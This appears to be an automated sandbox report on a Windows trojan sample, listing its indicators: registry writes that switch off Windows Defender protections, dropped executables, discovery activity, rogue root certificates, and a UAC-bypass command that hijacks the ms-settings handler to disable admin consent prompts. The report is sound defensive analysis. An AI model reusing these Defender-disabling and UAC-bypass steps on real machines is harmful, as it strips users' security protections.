52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5

Resubmissions

12-08-2024 19:23

240812-x3zrzazfqd 10

12-08-2024 19:07

240812-xs25cazbpd 10

11-08-2024 02:13

240811-cntl7azfnl 10

Analysis

max time kernel
45s
max time network
38s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
12-08-2024 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
Size

10.1MB
MD5

889956cee776d41937c39e225d3e72b6
SHA1

cc8d22b6c453deb2ac2826610cb001b3dd0e9771
SHA256

52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5
SHA512

2fde4df02392114a2e2676963d05d2a40c748710de7e30dad3deb1083fa1e991c85ae49520d679905ae21eaaed7f0458f38454ce04ea1d6544576f0ca3934de4
SSDEEP

196608:JAw2q0MYZLUFq6f07RGqOu0GIawyGkFk2uH4Fe4Baw0YzDOD0O7TjQq3IZ:76gFNMFuu0GIawyG714B/yD0OPje

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Executes dropped EXE 23 IoCs

pid	Process
2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
568	Adobe.exe
2620	Adobe.tmp
2864	7z.exe
2500	7z.exe
2204	7z.exe
2256	7z.exe
2456	7z.exe
1224	7z.exe
908	7z.exe
1048	7z.exe
1280	Set-up.exe
3036	7z.exe
2732	7z.exe
2616	7z.exe
2604	7z.exe
3060	7z.exe
2764	7z.exe
1512	7z.exe
2940	7z.exe
2144	7z.exe
2744	7z.exe
2212	00008.exe

Loads dropped DLL 27 IoCs

pid	Process
1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
568	Adobe.exe
1912	cmd.exe
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2500	7z.exe
2204	7z.exe
2256	7z.exe
2456	7z.exe
1224	7z.exe
908	7z.exe
1048	7z.exe
2620	Adobe.tmp
3036	7z.exe
2732	7z.exe
2616	7z.exe
2604	7z.exe
3060	7z.exe
2764	7z.exe
1512	7z.exe
2940	7z.exe
2144	7z.exe
2744	7z.exe
1736	cmd.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\is-0FN30.tmp	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe	Adobe.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\is-CODSN.tmp	Adobe.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobe.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Set-up.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00008.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mode.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mode.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2932	PING.EXE
1688	PING.EXE

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	Set-up.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Set-up.exe = "11001"	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	Set-up.exe

Modifies registry class 11 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129